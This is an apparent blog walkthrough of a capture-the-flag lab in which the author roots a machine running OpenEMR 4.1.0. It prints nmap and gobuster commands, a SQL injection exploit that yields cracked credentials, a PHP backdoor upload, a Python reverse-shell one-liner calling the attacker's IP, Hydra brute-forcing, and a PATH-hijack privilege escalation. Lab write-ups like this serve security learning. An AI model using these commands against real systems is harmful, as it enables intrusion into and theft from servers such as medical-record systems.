First and foremost, use netdiscover or nmap to find out the IP address of the target machine.
Attacker Machine: 192.168.131.128
Target Machine : 192.168.131.146
Perform thorough scan with Nmap to discover open ports, services and its respective version numbers.
nmap -sC -sV -p- -oN tcp_scan 192.168.131.146
Press enter or click to view image in full size
Port 21 and 80 are opened. I tried to log into FTP with anonymous but failed.
Press enter or click to view image in full size
Visit target website.
Press enter or click to view image in full size
robots.txt file in target website.
Perform directories brute-forcing with gobuster. After using directory-list-2.3-big.txt from dirbuster, I successfully discovered /openemr directory.
I used raft-large-directories.txt from SecList initially but couldn’t detect the /openemr directory.
Press enter or click to view image in full size
Visit http://192.168.131.146/openemr
Press enter or click to view image in full size
Discovered that the version of OpenEMR is v4.1.0 which is vulnerable to SQLi.
Acquired the python code from
poc.py
Press enter or click to view image in full size
change the url variable to reflect the IP address of target machine. Leave other configurations as default.
Execute the python code.
Acquired two credentials.
admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d
Crack the sha-1 hashes through
Press enter or click to view image in full size
Cracked Credentials:
admin:ackbar
medical:medical
Used the credentials to log into the openemr login page.
Press enter or click to view image in full size
Press enter or click to view image in full size
OpenEMR dashboard.
After exploring around for awhile, found out that under Admnistration -> Files from the left panel, I could upload file to the web server.
Press enter or click to view image in full size
Press enter or click to view image in full size
Save a simple-backdoor.php file in /tmp directory to upload to web server.
Press enter or click to view image in full size
Now, browse the php file and click Open.
Get Erictee’s stories in your inbox
Join Medium for free to get updates from this writer.
Click save afterwards and browse to http://192.168.131.146/openemr/sites/default/images/simple-backdoor.php
Press enter or click to view image in full size
Press enter or click to view image in full size
Launch a netcat listener on port 2324.
Reverse shell script:
python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.131.128",2324));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'URL encoded the reverse shell script and paste it on the cmd parameter.
Press enter or click to view image in full size
Under /home directory, discovered 3 users.
Users:
medical
almirant
mysql
Try to switch user to medical with the password “medical” .
It worked !
Inside / home/medical/Documents/ directory, I discovered a password.txt file, I tried to log into root with password given but failed.
Try to crack the password of user “almirant” through FTP using Hydra.
Press enter or click to view image in full size
Press enter or click to view image in full size
almirant:skywalker
I switched from user medical to almirant but nothing interesting found.
Find SUID binaries:
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
Press enter or click to view image in full size
The healthcheck binary catches my eyes immediately as this is not a normal binary that you would normally see in other machine.
Press enter or click to view image in full size
Analyze the binary with strings. I found out that the command is not written in absolute path. We can create a malicious binary and modify the path.
I created a malicious ifconfig binary inside /home/medical directory and included this directory in PATH environment.
echo “/bin/bash” > ifconfig
chmod +x ifconfig
export PATH=/home/medical:$PATH
Now, when we run the healthcheck binary, we should be able to get a root shell.
Press enter or click to view image in full size
Press enter or click to view image in full size
And there we have it. Thanks for reading and enjoy hacking !